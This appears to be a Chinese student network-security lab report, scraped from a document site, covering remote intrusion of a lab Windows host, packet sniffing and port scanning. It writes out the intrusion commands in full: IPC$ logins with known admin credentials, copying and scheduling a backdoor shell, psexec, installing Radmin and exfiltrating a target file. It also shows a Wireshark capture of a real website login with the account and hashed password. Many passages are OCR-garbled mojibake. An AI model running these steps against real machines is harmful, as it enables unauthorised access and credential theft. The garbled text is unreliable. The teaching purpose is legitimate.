网络安全试验报告_第1页
网络安全试验报告_第2页
网络安全试验报告_第3页
网络安全试验报告_第4页
网络安全试验报告_第5页
已阅读5页,还剩66页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、实验项目列表序号实验项目名称成绩指导教师1常用网络攻防命令使用2网络扫描器使用和分析3ARP欺骗工具及原理分析4DoS/DDo敦 击与防范5入侵检测技术67891011121314151617181920福建农林大学计算机与信息学院信息工程类实验报告系:计算机与信息学院专业:网络工程年级:09级姓名: 刘建凯学号:091154048实验课程:网络安全实验室号:_田513_ _ 实验设备号:_3_实验时间: 指导教师签字: 成绩: 实验名称:常用网络攻防命令使用一实验目的和要求目的:1. 了解网络访问的大致步骤和方法2. 熟练使用PsTools中的相关程序,能够使用该套工具进行基本访问和日志清除

2、3. 掌握NET命令组的使用方法,能够使用 NET命令组进行基本的访问4. 学会使用Radmin进行文件上传和下载要求:第一阶段:1.熟悉PsTools工具使用方法.2. 熟悉本章介绍的各种常用DOS命令.3. 学会使用Radmin进行文件上传下载.第二阶段:1.已知某台Windows操作系统的计算机管理用户名(csadmin)和密码(testadmin). 使用如下方法入侵该计算机(获得Shell,在对方计算机中安装远程控制程序进行屏幕控制):A.仅使用Windows的自带命令和远程控制程序;B.仅使用PsTools中的相关工具和远程控制程序.2. 获得对方每个盘的详细目录结构,并使用 TF

3、TP传到本地.3. 从传回本地的详细目录结构中找到文件security.dat所在位置,并传回本地.第三阶段:1.卸载对方系统中的远程控制程序2.完成选择题无法蹬入拒絶眼务,r搖#癡H杯-跳版纯绽入伶lr池=!抵llrllrH标知堆椀*讎藝入武他Q:标毁灭证据实验原理网络攻击原理及方法概要:心JC;;找林网洛段.:!地址5筑称”捜集尽可能翕的津辎信息.墓本扫描,辨别II存网络或主机所开枚和 提佻圖服狞.I戈及拗竹糸统皈家答:閒嫁剖探根雄目标提供餉羸务寻找安全 灭議点“例如Utt务代件渝洞、操件離统漏 涧甚至是病海圍下褻的后门输.収得却步权限】利用相吴漏洞或快得的用 户名利口令触紂进X瞩址的初步

4、权限-提”枕Hh如黑之梅我御紡权限不够则 崔已卉权限尿讪上継城通过蘇他方法捉 升权枫迸行破坏根据ASO的对目标選打相黃 操作.或者錐续对网站内其他甘标进行簿 透和友击*建立層门*庭成相辩碣安装木号、后门财克廛嵐号零,限|以后雞険对其 进行控制円毀炭1期;为了幫免被发理和迥踪.満陆 威斤伪越柏黄入僵H壽利其他扎侵瘟迹,瘫痪目标 4三主要仪器设备(实验用的软硬件环境)PsTools工具:一个命令行下的 WindowsNT/2000/XP/2003远程或者局域系统管理工具包.Radmin工具:一个将远程控制、外包服务组件、以及网络监控结合到一个系 统里的远程控制软件.cshell实验所需工具PC 机

5、两台四实验内容与步骤1、基于Windows命令的远程访问本次远程访问简介已知一台电脑的管理员用户及密码,最简单的远程访问莫 过于基于建立ipc连接的远程访问.在建立ipc连接之后,我们可以很方便的复制 文件到远程主机,运行已复制的软件,从而达到远程访问的目的.本次远程访问 步骤:第一步:建立ipc 连接C:xDocuinents and Settingsin istratornet use WJ.72 _31 _63 _37ipc$ testadmin /uer:csadr*in命令成功完成C:M)ocu(ents and Sett第二步:将被远程访问电脑的C盘映射为本地的Z盘或者直接复制文件

6、至被远程 访问电脑的C盘将被远程访问电脑的C盘映射为本地的Z盘(建议使用).C: Docunents and Sett insrsistratoinet use z: 172 3:L63 ,37c$命令成功宪成。J 1T2.31 63 3Tc$ CE:I网络驼动器上的直接把cshell.exe复制至被远程访问电脑的C盘下.SSODownloadlE半夹*臬面A我的文档H我的电脑+ 9本地磁盘i y 凯 6:)FF:本地磁盘住:)1+ J DVD 驰动器(F:)+ J DVD驱动器(G.)-_ J 172 31-63 3T 上的XUeleone to our hone of LISSThy ch

7、enjinef. Vour IP is 172 眦 3 47, Vour Port Is 1221Only For a test*勺电脑本世磁盘(CJ凯CD )本tfi磁盘厲:第三步:远程运行cshell.exe,作业设定的是在10 : 25运行已复制在29 电脑上的 cshell.exe 文件.3: Docunents and Sett sdnirnistiatorat SM.7 10:25 c : cshe 11 新加了一项祜业,其伍业ID =.在cmd命令中输入teInet 29 1234(没有引号),完成远程访问.C -

8、Documents 畝ntl Sett insMldinin istratortelnet 172 31.631234Microsoft Windows XP【版本 5 1.2600 3 版权所有 19852001 Microsoft Corp-C:截至此处,本次实验目的达到.获得被远程访问者的Shell之后,访问并没有结束, 为了下次访问方便,或者利用此电脑访问其他电脑,一般都会在已访问的电脑建 立后门.下一节实验是用PsTools工具进行访问,用Radmin进行屏幕控制.在本次 访问 之后,我们先做一些准备工作,将Radmin的服务端复制到已访问电脑.Radmin 服务端包括:r_serv

9、er.exe,raddrv.dll,AdmDLL.dll.在本地电脑的 C盘根目录下放着,现在将它们复制到IP为01,账号为csadmin,密 码为testadmin 的电脑中.输入复制r_server.exe 文件命令(已建立IPC连接):copy c:r_server.exe8c$1 XDocunents and Sett;ingsfidmin 1stratorcopy c - ir_sei*uer. exe W172.31.63 .38c$ 三复制1个文件。2、基于PsTools和Radmin的远程访问本次远程访问简介利用PsTools中的ps

10、exec.exe程序将cshell.exe 复制至远程主机并运行,然后获得Shell,利用上次实验已复制好的 Radmin服务端,把Radmin安装在被访问电脑上,进行屏幕控制.本次远程访问步骤:第一步:将cshell.exe 复制至远程主机并运行.在建立ipc连接之后,我们使用 psexec.exe就不要输入远程电脑的账号密码,较为方便.输入建立ipc连接命 令:net use 01ipc$ testadmin /user:csadmin利用 psexec.exe复制cshell.exe 至03 并运行.我们在使用psexec.exe时,通常在命

11、令行后面加上-d参数,表示不等待程序执行结束就返回.把cshell.exe 复制到03 并运行.C: Dcrcunent and Sett ingssAdmin 1stratoFpsexec 气M8 -c c - che Ll.exe - dPsExec ul.SS - Execute processes remotelyCopyright 2001-2H04 Mark RussinouichS/sin ternals - uuu .s/sinternals .com在本地电脑输入tel net 03 1234, 成功.Ueleo

12、ne to our hone of LISSfbv chenJr our IP is 17270, Vour PoPt is 1124Onl For a test *Microsoft U indous XF 版本 5.1.2600 版权所有 19852001 Microsoft Corp-C:WrNDOWSXsystem32第二步:在01上面安装Radmin服务端.运用psexec工具进入远程电脑的cmd命令工具hicrosoft Windows XP5 A-26001psexec X172-31 63*38 endPsExec ul_55 - Execute proc

13、esses pemotelyCopyright 2001-2004 Narlt Russinoulch internals - wwwsys internaIs gof)Microsoft Uindous XP 版本 5,1-2&001 版权所有 1985-2EH1 Microsoft Corp.C:WlHD0WSXsyst&m32安装Radmin的服务端并启动服务C: i*_server /installC: net start rErverRemote Adn in 1st rat or Seru ice 川.丹正在启动 * Remote Adninistrator Seruice 服务已

14、经启动咸功。随后我们就可以在 Radmin客户端上,点击新建连接,在其中输入已植入 Radmin服务端,安装并开启服务电脑的IP地址(01),在连接模式中选择需要类型,然后双击已建立的连接,就可以进行控制了进行连接:连接类型完全控制常规-远程屏幕完全控制 文本屏專 聊天 语音耕天所连接的TF地址或D阳8,口| X,端口:4B99向使用款认端口连接后,对方的桌面图:3、寻找并传回目标文件 security.dat本次远程访问目的到现在,我们已经熟悉了两种远程访问的方法,并且在两次访问中已经把 Radmin这个强大的远程控制软件安装完成,接下来要做的就是

15、 寻找被访问电脑上的 security.dat( 正确的security.dat 内容为this is the right for the test, 无引号),并将其传回本地.本次远程访问步骤:第一步:查找security.dat存放的位置方法一 :Radmin工具利用Radmin工具将被访问电脑文件夹选项修改为显示所有文件和文件夹.然后用搜索选项搜索 security.dat.用连接模式中的完全控制连接被访问电脑,双击被访问电脑的图标,在被访问电脑的我的电脑-工具-文件夹选项-查看中修改.It JI IJ rw LI * i II W U. I *D隠藏文件和文件夹显示所有文件和文件夹o不

16、显示隐藏的文件和文件夹函藏已知文件类型的扩展名0用彩色显示加密或压缩的NTFS文件在标题栏显示完整路径n 存童独朗讲稈中打打廿怦夹宙口在被访问电脑的我的电脑-搜索选项中搜索security.dat,通过直接查看文件,找到正确的security.dat.按下面任何咸所有标唯进各全部或部分文件名(Q);security,dat文件中的一亍字或词组(妙:在这里寻找J_我的电脑“什么时候修改的?苓方法二:dir命令进入被访问电脑的 cmd命令行工具.在cmd命令行中输入dirc:security.dat /a/s来查找目标文件./a/s表示显示当前目录下所有文件,包括隐藏文件和子目录下的所有文件.G:

17、 documents and. Set tings XA dm in isti*atopd ir c : Xsecurity -dat /a/sc = 的目录2006-01-0205:03ri个文件0字节所列文件件0个目录4,786,421,76U可庙字节C: xDocuiments and SettingfsMdninistratoi*dir命令能够详细的显示查找的文件大小,由目标文件的内容可知其大小是 30字节,不需要查看文件内容就可以找到正确的目标文件,降低风险.第二步:将已查找到的正确的security.dat文件利用 Radmin传回本地.把Radmin的连接模式改为文件管理,双击被

18、远程访问电脑图标进入文件管理模(;)E)CFJGJCJ运稈沉/恿8(CJ(SJ(FJGJ进入正确的security.dat 文件目录,选择拷贝目录到另外的计算机,传回目标 文件成功(由于目标文件属性是隐藏,所以传回的文件也是隐藏属性,需要在本地 电脑把文件夹选项修改为显示所有文件和文件夹,此过程省略).顾录到另倾计宜辄security.datsecurity.dat壬DAT文件i KBb security,dat -记事本用记事本打开传回本地的security.dat 文件,确认是自己想要查找的目标文件. 截至此处,本次实验目的已经达到.立件(巳編辑格式(0查着帮助(宙this is the

19、right For the test4、卸载被远程访问电脑的远程控制程序本次实验目的卸载被远程访问电脑中的Radmin服务,并删除Radmin的服务端安装程序及cshell.exe.本次实验步骤第一步:卸载远程电脑中的Radmin服务.进入远程电脑cmd,停止Radmin服务(使 用 psexec之前,已建立ipc 连接).C: Documents and Set tin s(sMldn)inistratorpsexec W172 316328 c(nd PsExec vl,55 - Execute processes moteI*/Copyright C? 2001-2004 liaik R

20、ussinouicliSi/sinternal= - uw.s i/s internals - comMicrosoft Ulndous XF 版本 5 _1.2&00 版权所有 1985-2081 NicrosoFt CorpC:WINDOWSsystem32net stop seruerRemote Adntinistrator Service 月艮务正牡停止 Vtemote Adninistratoi* Service 服务己成功停止。C:WIND0WSsystem32卸载远程电脑Radmin服务(最后一行命令是检验Radmin服务是否被成功卸载).C:WI NDOWS Xs ys t

21、en3 2c d c:XC:v_sepueF /uninstallC: net start i*_sei*vei*务奢无效请犍入NET HELPMSG 2185以获得更多的帮助*第二步:关闭r_server服务的进程.用pslist命令查看r_server进程的pid.C: M)ocumen and Set tings Mldmin 1st ratoirps list X192 168.11 31PsList 1.2& Process Infoi?nation ListerCopyrigfht CO 19992004 Mark Rules in ovichinternals - www辱ywi

22、ntern曰丄壽.comProcess inFormat ion f oi* 192.1&8.1 _101:end0:12:54.812764612:32800:00:00.015r_seruer82S813716800:80:00.0620:11556.89081281208248:00:00.0310:10:44.890用pskill命令关闭r_server进程.C: Documents and SettingsMtdministratoipski 11 192.168 .1.1 31 828PsKill ul. 03 - I erninates processes on local or

23、 re mote sjste msCopviht CO 1997-2004 Mai*k RussinouichSsinternals - wwu sj;s internals .comProcess 828 on 192.l&S.1.101 hilled.C:Documents and SettingsAdministratopskill X 31 812PsKill ui0H - TerninAtes processes on local or remote sywte nsCopyright CO 1999-2004 NairR RussinovichSvsinter

24、nal? - uwv 醫internals .comProcess 812 on 192.1&8.1.101 hilled.第三步:删除Radmin服务端安装程序及cshell.exe.将远程电脑的C盘映射为本地的Z盘.进入本地Z盘即远程电脑 C盘,删除Radmin服务端安装程序及cshell.exe.文件和文件鉴任答tty Install ati ns/ new EiqIJI rihrCSCywin IJ复制所选顶目 将选3$的皿目境布到U电子邮:件带式進匡斷选琐自确实要删险这石顶呜辛R.a.vBinX删除所选项目确认rcras0範-Q *底立标画地址壬艺:星TQ)截至此处,本次实验目的已达

25、到.五实验总结通过本次实验,我学会了远程控制对方的主机,学会使用远程控制的相关工具,为后面进行攻击做好基础准备六质疑、建议、问题讨论有哪些方法可以防止受到本实验中提到的类似攻击?答:保护好自己的密码,密码等级可设级别高一点,防止被人破解,要开启防火关闭本地电脑ipc$共享关闭本地电脑ipc$共享,远程电脑与本地电脑建立ipc连接 的时候,远程电脑的cmd命令中会提示:发生系统错误67找不到网络名.关闭本地电脑的ipc$共享C:Documents and Settingsdninistratornet share ipc$ zdel ipc 5己经删除。远程电脑欲和本地电脑建立ipc连接,提示:

26、发生系统错误67,找不到网络名C: documents and Set tin gsMldnin istpator net uce SM.92.168 .1 .103ipc$ testadmin /user:csadmin发生系统错误67.找不到网络名需要的时候打开ipc$共享C t SBocuments and Sett ing;s SAdiin istPatornet share ipc$ ip请共享成功。福建农林大学计算机与信息学院信息工程类实验报告系:计算机与信息学院专业:网络工程年级:09级姓名: 刘建凯学号:091154048实验课程:网络安全实验室号:_田513_ _实验设备号:

27、_38实验时间: 指导教师签字: 成绩: 实验名称:网络扫描器使用和分析一实验目的和要求通过使用网络扫描软件,了解目标主机端口和服务的开放情况,从而进一步获取信息,找出系统安全漏洞。通过抓包软件的使用,捕获一些敏感数据(如密 码)。通过本次实验,可以了解到端口与服务开放的风险,增强在网络安全防护方面的意识,还可以捕获局域网中用户的账号和密码。实验具体要求如下:1. 熟悉网络数据包捕获工具的使用2. 熟悉扫描程序(漏洞、端口)的使用3. 能够利用抓包工具分析扫描程序的具体原理二实验原理Wireshark简介及使用原理:Wireshark (前称Ethereal )是一个网络封包分析软件,不是入侵

28、侦测软件。网络封包分析 软件的功能是撷取网络封包,并尽可能显示出最为详细的网络封包资料。网络封包分析软件的功能可想像成电工技师使用电表来量测电流、电压、电阻的工作-只是将场景移植到网络上,并将电线替换成网络线。对于网络上的异常流量行为,Wireshark不会产生警示或是任何提示。然而,仔细分析Wireshark撷取的封包能够帮助使用者对于网络行为有更清楚 的了解。Wireshark不会对网络封包产生内容的修改,它只会反映出目前流通的封包资讯。Wireshark本身也不会送出圭寸包至网络上。Xscan简介及使用原理:Xscan采用多线程方式对指定 IP地址段(或单机)进行安全漏洞检测,支持插件功

29、能,提供 了图形界面和命令行两种操作方式,扫描内容包括:远程服务类型、操作系统类型及版本, 各种弱口令漏洞、后门、应用服务漏洞、网络设备漏洞、拒绝服务漏洞等二十几个大类。nmap简介及使用原理:nmap是Linux,FreeBSD,UNIX,Windows下的网络扫描和嗅探工 具包,其基本功能有三个,一是探测一组主机是否在线;其次是扫描主机端口,嗅探所提供的网络服务;还可以推断主机所用的操作系统。Nmap可用于扫描仅有两个节点的LAN,直至500个节点以上的网络。Nmap还允许用户定制扫描技巧。通常,一个简单的使用ICMP协议的ping操作可以满足一般需求;也可以深入探测UDP或者TCP端口,

30、直至主机所 使用的操作系统;还可以将所有探测结果记录到各种格式的日志中,供进一步分析操作。三主要仪器设备(实验用的软硬件环境)1. 要求实验室内网络是连通的,组内每台计算机均可以访问另外一台计算机。2. 下载相关工具和软件包 (wireshark,Xscan,nmap)。3. 在计算机中安装相应的软件四实验内容与步骤1、利用WireShark捕获数据包在VOA网站( WireShark捕获数 据包,对捕获到的数据包进行分析,找到用户名和密码。1. 打开VOA网站,进入会员登录界面。UNSV.COM语学习频道创办于200 M年,会员服务屮心妙每日签到 MiaiuuEiuu uaiumui eiu

31、 =u ui uuA帐户emai哋址:1402717048登录密码:工忘记了宅码?下次目动登录乂网吧勿用免费注册会员登录2. 输入相应的用户名和密码UNSV.COM语学习频道创办于20。M年,会员服务中心冷每日签到帐户Emmil地址:1402717048s登录密码:焦说了黨码下次自功登录H网吧勿用免费连册合员登录3. 起动 WireShark 应用程序,点击 Capture - In terfaces - Optio ns,将 CaptureFilter设置为tcp port http,再点击Start起动。4. 在捕获的包中查找相应的用户名和密码。3 4 13 05 6 6 6 2feee

32、5 3f6 6 7 66 6 6 0o 5 4 d4 c o 3 57 2 2 6 65-9 4 e 96 6 7 6 63- 7 f f 16 6 6 6 420d670d0d5 9 4 f b4 6 7 6 45d2 2 7 z o3- a 3 e6 7 7 6aaaa0 3 0 0o o a 5 67 7 3 6 71- o 8 3 d4 2 4 45 4ega43 0 3 3 A-4o7 7 7d22 3776633333366O4dblo533311673663244436295 edl7ooo439&2 6-7333336-65f215135551146 63667 4 2223G

33、-&2d6 3651253330263-*244 45 eld457ooll66633433336SE).Acc ding: gz ateHO5 com.conKeep-AlRTeT mem i eoption oups=2C &nicknam 5ernaine= 4%4Oqq% sc=O%7CO CO%7CO%7 CO%7CO%7ept-Enco ip, defl t: unsv necti oruZO%7CO%7 Cl&passw 0aa9741c 66e3f2d9 736423.rd=141b710bacaS b8tlai d=捕获的用尸名为:1402717048捕获的密码为:141b

34、0a09741c710baca8经过加密2、利用Xscan扫描主机和局域网中的开放端口和漏洞1. 安装并运行Xscan,设置扫描的参数。在指定 IP地址范围时,将IP改为 ;然后再设置检测范围,选择所需要的扫描内容。扫描参数设置完毕后,开始扫描。扫描完成后,扫描结果如下:(1) 扫描的漏洞如图所示:主机分析:5主机地址皓口/展务區务漏洞Sneios-ssn J13/tcp;发现安全提示5nnicrosoft-d$ 445/tcp)发现安全提示5epmap (135/tcp)发现安全提示17

35、5netbios-ns (137/ucp)览现安全提示172.3L63.35ntp (123/jdp)发现安全提示|扫描的内容如图所示:X-Scmi v3 3 -网络安全漏洞扫描器亠亠安全焦点:http: /ww*. itfocus. net (M3文站http: xfocus.站)正在加载插件.載入插件完毕正在加载漏洞檢测脚本.载入脚本完成正在分段检测存活主机.172. 31 83. 35:主机存活j响应沏P谙求检测到1亍存活主机(用时乩8次秒) 正在检测 *1T2.31 &3. 3S*_r . 1T2. 31.63 35 172,31. &3, 35: 172.31.63

36、 35 172,31. &3. 35: LT2.31.63 35 172,3L&3. 35: 172.31.63 35 1T2.31&3. 35: LT2.3L.B3.35 172.31.&3. 35: 172.31. &3.35 17?. 31.63.3S: 172.31.63 35 172.31 63. 35: 1T5 C1T2.31.B3.3S: LT2.31.&3 35 5: 1T2.31.63 3S 172.31 63. 35 LTE.31.63 35正在捡测开放服务“.正在檢测HT-Server口輕 逹立HPDJ空会话成功HT-S督狀弱口孚扫

37、描完成, 正在检.正在檢测信息“.,. 咚臥”信息“扫詰完成.正在卷测*远程操柞丟统 远程操作系扫挂完咸.正在ifiilTElMr弱口令* TEmr弱口令”扫描完成. 正在检测ss鹅弓口春, 公码弓口令“扫描完成一 正在檢测牛IT弱口铲FTF弱口令”扫描完成一 正在椅测,irSQL-Server 口令 YSL-S ei化r弱口令盘完成.正祖檢测VHC器口令. VHC弱口令扫描寿成一 正在檢测“漏洞检测脚 扫描全部芫成.2. 将IP地址范围改为-54扫描范围不变,再重新扫描 次。重新设置完毕后,开始扫描,扫描后的结果如下: 扫描的漏洞如图所示:X-Sc

38、an v3. 3 -网络安全漏洞扫描器亠亠安全焦点:http: /www. xfocus. net (M3文站)http: xfocus. orglZCf站)正在加载插件.載入插件完毕正在加载漏洞檢测脚本.載入脚本完成正在分段检测存活主机172.31. S3. 35主机存活,响应ICMP谙求检测到1亍存活主机(用时&. 8茨秒)正在检测叮佗31.63.35172. 31.&3 35:5:172.31. &3 35 :5: :172,31.63.35 :1T2,31 &3. 35:5 :5:1T.31.B3

39、35 :1T2.31.&3. 35:5:1T2.31.63. 35:1T2.31.63 35 :172.31.B3. 35: 5 :1T2 31.63. 35: 172.31. S3.35 :1T2 31.63. 35172.31.S3 3S :1T2 31 63. 35 1T2.31.63 35正在检i!T开放服务J 正在检测Ft-轨戢弱口令路 建立工p関空会话成功 HT-S e严r弱口拿扫描完成, 疋在检测NmtBio牆直* 正在检测信息 吒顶卩信息”扫鑰完成.正在卷测*远程操年系统 我远程操作系颈“扫挂完咸.正在检测TEUET 口令 rErnr

40、弱口令”扫描完成. 正在橋测孟鹅弓口壬 蚀码弓口令“扫描完咸一 正在檢测写TF弱口铲 FTF弱口令“扫描完戚一 正祖稔测SQL-Server口令 YSL-S ei化r弱口令右盅完成. 正袒梧测VHC覇口令 VMC弱口令“扫描寿成一 正在檢测“馮洞检测脚本-. 扫描全部芫咸.扫描的内容如图所示:X-Scwi v3 3 -网络安全漏洞扫描器亠亠安全焦点:http: /www. itfocus. net (M3文站)http: /#ww irfocus. orglZCf站)正在加载插件.载入插件完毕正在加载漏洞檢测脚本.載入脚本完成正在分段检测存活主机.E172. 31 63 35:主机存活,响应I

41、OVlff求检测到1亍存活主机C用时& .8项秒)正在检测1T巳31.63.351T2. 31.63 35:172.31.&3.35:172 31. &3 35 :1T2.31 63. 35:1T2.31.&3 35 :1T2,31 63. 35:172.31. G3 35 :1T2,31.&3. 35:1T2.31.B3 35 :172.31.&3. 35:5 :17?.3i.B3.35:1T2.31.63 35 :172.31.&3. 35: 5 :1T2 31.63. 35:1T5:1T2 31.S3. 35172.31. B

42、3 3S :LT2 31 &3. 35172.31. S3. 35正在粒测开矽服务.正在检测FT-轨一誌弱口令 建立:烈$空会话成功HT-S小打弱口冷扫描完成, 正在检信前 正在检测信息 飞沏卩信息扫鑰完成.正在卷测*远程操作系统 我远程操作系蟒“扫挫完咸.正在檢测TEUIT 口令 TEmr弱口令”扫描完成.正在检测孟鹅弓口窖 蚀蹋口铲扫描完就 正在檢测FTF弱口铲 FTF弱口令“扫描完戚一 正在稔测SQL-Server口令 YSL-S ei化r弱口令扫奔完成. 正祖檢测VHC覇口令.VHC弱口令”扫描寿咸一 正在檢测漏洞卷测脚本 扫描全部芫咸.X*Seaa Report介 d绍口/廉务安全汇

43、科及解决方3K11示netto$-$sn (139Acp)ffMK务netbwWK务可琵运行于该後口.BAfoo$oft-d$-B务可18运行于该議NESSUSJD : 10330援示nxrosoft-ds (445/tcp)SHB运行在445 口上礙主机开JH74453J口 ,没有开环口两台Wrxtows 2000主机间的Zbosy 遇讯過过44SS?口芫或攻击者可以力闻该漏确取主机 的共享连n用pw列KRMHoia.解决方実:过健血1 口收劲的数瓶叱燧中A CIFS server s runmg on ths port hESSUSJD : 11011nwaosoft-ds (445/tc

44、p)smbHK当试侵用參个togr/pagdffl合108腳主机參号$514: http:/5upport.nK甘考费科:http:/$cjppoct.mcrosoft.co i$upportJkb/drbde$/Q246/2/61. ASPRKMQF:中 X-SziUportJ“ ) 十 11 示mcrosoft-ds (445Ao) SMB当isW$a!用多个toazwdtfl合亟病程主机夕号 J5M: http:/suppor t.fma osoftcom/suppor 備/ t)des/Q 143/4/74. ASP 夢考资科:朴ttp:/5upport.eao$oft8m/5uppo

45、rtAi)/dedes/Q2%/2/61.ASP-NUU sestons are enabled on the remote hostCVEJD : CAN-1999-0SO4, CAN 1999-0506, Cf-X00-0222, CAN-1999-0S05, CAN-2002-1117 BUGTRAQ.ID : m 990, 11199KSSUSJD: 10394K示gosoft* (445/tCP)DfttaiMSMBiia注衰用户町以侵用试中的08 / MEd粗合远糧逹授注册衰. 允许1連建注册衰存在在磁攻击者DJ也由此殃腋更參主机AM.解决方宴:如果还设百施&、心23?卜丁先安!之

46、.同时设Jt注册襄子鏡 HQY$T0yCtrrentContro*SetVControl* 只允许菩瑾员用尸浏4内容.另外,从砖si 口域论主机授收到的数霜磋帕:條It was not possMe to connect to PIPOrrefl on the remote host.If youtend to use Nessus to perform restry-based checks, the rtQStry dcks X not work because the Remote Restry Access* service (xng has been dsabied on the r

47、emote host or can not be connected to with the stppkd aedentakf.I esusjo: MHOOit示nKrosoftnnl.BI/ rvMYd IB斜刃WJTfiR .絵 Btpert*1提示rretbtQ5-n& U37Ajdp)楼用 NetBIOSSI WvHJowf 主机信总如果唯脚05确口 W:i3乃巳经打开j 一个运程我击耆或以利用这于躺司慕祸主机 的敏惑信启,比如机器名,工作趙黴名r 当前賛陆用尸名禅解决方法:阴止这个端口的外韶邁信*飓嶼A中The fan 艸蚀斗 Me (BIOS names have been 3 t

48、hwMl :5 HSTU35 Thts 4 the cumpuler nime rtpaoerfcd f7:6i:f5If you do not want (0 jIqw ewrorie 悼衣 thewwof vwr WfflpHter* 旳u bwW filter ncomng traffic to ths cwt.Rt. foctnc : LtrACVEJD ; CAN 19994621rSSUSJO :JO1K標示K)IVTF read variable*A N7P (Neh.iofk Fma 氐政皿 secflf is 话毎mg on ths portZ fktw : Low h5SU

49、S_ID : 1OSS斗3、利用nmap对局域网中的主机进行扫描1. 下载安装好nmap后,运行cmd,将目录打开到装nmap的文件夹下,然后输入:nmap -sP -254用于探测局域网中开放的主机。扫描完成后输出的结果包括目标的主机的IP地址和MAC地址,如图所示:j: Documents and S&ttingsAdministratorcd c: Xijlnmap sF 172 3丄.63-丄254itapting Nmap 5.00 ( littp:/ at 2011-12-20 16 :2& 中国杯推时间 lost is

50、 up (0-00s latency?.1ftC Address : 00 : 1B: B91 :B7:DG :C3 Elitegroup Computer System Co .lost is up 0-00s latency?.1ftC Address: 00 : 1B : B9 : B7:D0: A5 1AC Address: 00:IB:B9:B&:79:60 st 172.31.63 -155 up 0.0 latency-1AC Address: 00:1B:B9:B?:6C:2C Elitegroup Computer System Go. lost 172-31.250 is up .1AC Addpess: 00:01:6C:99:63:89 Hmep done: 254 IP addresses scanned in 67-72 seconds2. 扫描完局域网中存活的主机后,选择其中的一个,输入命令:nmap -O29,用于探测目标主机的操作系统。扫描完成后输出的结果包括目标的主机的操作系统和开放端口,如图所示:Mnmap -0 172.31H63B3St art ing Nnap S . 00 at 2011-12-20

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论